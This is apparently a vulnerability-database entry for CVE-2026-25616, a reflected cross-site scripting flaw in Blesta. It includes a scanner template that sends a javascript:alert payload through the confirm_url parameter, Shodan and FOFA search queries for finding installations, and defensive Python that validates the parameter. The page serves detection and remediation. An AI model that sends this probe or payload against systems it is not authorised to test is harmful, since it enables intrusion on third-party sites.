
Blesta <= 5.13.1 - Cross-Site Scripting

CVE-2026-25616
Verified

Description

Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability (cross-site scripting, CWE-79) caused by mishandling input, which may let attackers exploit the system; exploitation requires unspecified conditions.

Severity

Medium

CVSS Score

6.1

Exploit Probability

2%

Published Date

April 8, 2026

Template Author

0x_akoko

CVE-2026-25616.yaml
id: CVE-2026-25616

info:
  name: Blesta <= 5.13.1 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
   Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
  impact: |
   Attackers can exploit input validation flaws to cause unexpected behavior or security issues.
  remediation: |
   Upgrade to version 5.13.3 or later.
  reference:
    - https://karmainsecurity.com/KIS-2026-01
    - https://www.blesta.com/2026/01/28/security-advisory/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25616
  classification:
    cve-id: CVE-2026-25616
    epss-score: 0.0246
    epss-percentile: 0.85424
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.title:"Blesta"
    fofa-query: app="Blesta"
  tags: cve,cve2026,blesta,xss

http:
  - raw:
      - |
        GET /client_dialog/confirm/?confirm_url=javascript:alert(document.domain) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="javascript:alert(document.domain)"'
          - '<form method="post"'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402203576638fa18efab2ade52c285d91ad6653406ed821d9c013b1864be77b3af562022009df6f972864e63b41afcef6dd21a85bc8039d68527f3d6c0ddd21888fa2cdca:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2026-25616
CWE ID: CWE-79

References

https://karmainsecurity.com/KIS-2026-01
https://www.blesta.com/2026/01/28/security-advisory/
https://nvd.nist.gov/vuln/detail/CVE-2026-25616

Remediation Steps

Upgrade to version 5.13.3 or later.
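The template's matcher shows the vulnerable pattern: the confirm_url query parameter is reflected verbatim into the form's action attribute, so a javascript: URL becomes executable script (CWE-79). As an added defender-side example, not Blesta's code and not part of the template, the Python below shows the kind of allow-list check a redirect/confirm parameter needs before it is escaped into an attribute; ALLOWED_HOSTS, DEFAULT_CONFIRM_URL and the function names are assumptions, and the host values are constructed.

```python
import html
from urllib.parse import urlsplit

# Hypothetical allow-list for the confirm_url parameter (constructed sample values).
ALLOWED_HOSTS = {"billing.example"}
DEFAULT_CONFIRM_URL = "/client/"   # safe fallback when the supplied value is rejected


def safe_confirm_url(value, allowed_hosts=ALLOWED_HOSTS):
    """Return value if it is a same-origin path or an http(s) URL on an allowed host, else None.

    Rejects javascript:, data: and every other scheme, protocol-relative //host
    values, and anything carrying control characters (browsers strip tabs and
    newlines from a scheme, so 'java\\tscript:' must not slip through as a path).
    """
    if value is None:
        return None
    value = value.strip()
    if not value or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return None
    parts = urlsplit(value)
    if parts.scheme == "" and parts.netloc == "":
        # urlsplit already routes '//host' into netloc; browsers also treat
        # '/\host' like '//host', so only a plain single-slash path is accepted.
        if value.startswith("/") and not value.startswith("/\\"):
            return value
        return None
    # parts.hostname is lowercased and strips userinfo, so 'https://good@evil/'
    # is judged by 'evil', not by the text before the '@'.
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return value
    return None


def render_confirm_form(confirm_url, allowed_hosts=ALLOWED_HOSTS):
    """Render the confirm form with a validated, attribute-escaped action."""
    target = safe_confirm_url(confirm_url, allowed_hosts) or DEFAULT_CONFIRM_URL
    # html.escape(quote=True) stops the value breaking out of the attribute;
    # the scheme check above is what blocks javascript: URLs as the action.
    return '<form method="post" action="%s">' % html.escape(target, quote=True)


if __name__ == "__main__":
    for sample in ("javascript:alert(document.domain)", "/client/", "//evil.example/x"):
        print(repr(sample), "->", render_confirm_form(sample))
```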